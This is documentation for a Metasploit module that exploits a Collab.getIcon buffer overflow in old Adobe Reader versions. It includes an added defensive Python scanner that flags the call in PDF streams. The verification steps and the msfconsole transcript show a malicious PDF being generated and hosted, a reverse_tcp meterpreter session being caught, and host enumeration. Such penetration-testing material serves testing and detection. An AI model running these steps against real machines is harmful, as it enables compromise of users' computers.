## Vulnerable Application

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1.

By creating a specially crafted PDF that contains a malformed `Collab.getIcon()` call, an attacker may be able to execute arbitrary code.

Link to vulnerable software: [OldVersion](http://www.oldversion.com/windows/download/acrobat-reader-8-0-0)

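
A defender-side triage check for the condition described above, as an added example that is not part of the module or its documentation: it inflates Flate-compressed streams in a PDF and flags any reference to `Collab.getIcon`. The function names and the sample document are constructed for illustration, and the check is plain string matching that does not evaluate script.

```python
import re
import zlib

# API named in the module description; whitespace around the dot is tolerated.
GETICON = re.compile(rb"Collab\s*\.\s*getIcon")
JS_NAME = re.compile(rb"/(?:JavaScript|JS)\b")
STREAM = re.compile(rb"stream\r?\n(.*?)\r?\n?endstream", re.DOTALL)
HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def decoded_views(pdf: bytes):
    """Yield (label, bytes) for the raw file and each stream that inflates."""
    # PDF names may hex-escape characters (/J#61vaScript), so undo that first.
    yield "raw", HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), pdf)
    for idx, match in enumerate(STREAM.finditer(pdf)):
        try:
            # decompressobj tolerates a trimmed trailer better than decompress()
            inflated = zlib.decompressobj().decompress(match.group(1))
        except zlib.error:
            continue  # not Flate data; the raw view already covers it
        yield f"stream[{idx}]", inflated


def scan_pdf(pdf: bytes):
    """Return (location, reason) findings for triage; empty list if none."""
    findings = []
    for label, data in decoded_views(pdf):
        if label == "raw" and JS_NAME.search(data):
            findings.append((label, "document carries JavaScript"))
        if GETICON.search(data):
            findings.append((label, "Collab.getIcon reference"))
    return findings


def build_sample(js: bytes) -> bytes:
    """Constructed PDF-like bytes with one Flate-compressed script stream."""
    body = zlib.compress(js)
    head = b"%PDF-1.4\n1 0 obj\n<< /S /J#61vaScript /JS 2 0 R >>\nendobj\n"
    obj = b"2 0 obj\n<< /Filter /FlateDecode >>\nstream\n" + body
    return head + obj + b"\nendstream\nendobj\n%%EOF\n"


if __name__ == "__main__":
    # Constructed, benign script text: it only names the API.
    for finding in scan_pdf(build_sample(b"var i = Collab.getIcon('sample');")):
        print(finding)
```

A hit is a reason to check the installed Reader version against the affected ranges listed above, not proof that the file is malicious.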

### Test results (on Windows XP SP3)

* reader 7.0.5 - no trigger
* reader 7.0.8 - no trigger
* reader 7.0.9 - no trigger
* reader 7.1.0 - no trigger
* reader 7.1.1 - reported not vulnerable
* reader 8.0.0 - works
* reader 8.1.2 - works
* reader 8.1.3 - reported not vulnerable
* reader 9.0.0 - works
* reader 9.1.0 - reported not vulnerable

## Options

**FILENAME**

The file name

## Verification Steps

1. Install application on the target machine
2. Start msfconsole
3. Do: `use exploit/windows/fileformat/adobe_geticon`
4. Do: `set payload [windows/meterpreter/reverse_tcp]`
5. Do: `set LHOST [IP]`
6. Do: `exploit`
7. Do: `use exploit/multi/handler`
8. Do: `set LHOST [IP]`
9. Do: `exploit`
10. Do: Open PDF on target machine with vulnerable software

## Scenarios

### Adobe Reader 8.0.0 on Windows XP (5.1 Build 2600, Service Pack 3)

```
msf > use exploit/windows/fileformat/adobe_geticon
msf exploit(windows/fileformat/adobe_geticon) > set FILENAME icon.pdf
FILENAME => icon.pdf
msf exploit(windows/fileformat/adobe_geticon) > exploit

[*] Creating 'icon.pdf' file...
[+] icon.pdf stored at /root/.msf4/local/icon.pdf
msf exploit(windows/fileformat/adobe_geticon) > cp /root/.msf4/local/icon.pdf /var/www/html/icon.pdf
[*] exec: cp /root/.msf4/local/icon.pdf /var/www/html/icon.pdf

msf payload(windows/meterpreter/reverse_tcp) > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Sending stage (180291 bytes) to 192.168.1.5
[*] Meterpreter session 3 opened (192.168.1.3:4444 -> 192.168.1.5:1160) at 2019-12-06 14:40:10 -0700

meterpreter > sysinfo
Computer        : COMPUTER_1
OS              : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: COMPUTER_1\USER
meterpreter > run post/windows/gather/enum_applications

[*] Enumerating applications installed on COMPUTER_1

Installed Applications
======================

 Name            Version
 ----            -------
 Adobe Reader 8  8.0.0


[+] Results stored in: /root/.msf4/loot/20191206144654_default_192.168.1.5_host.application_162364.txt
```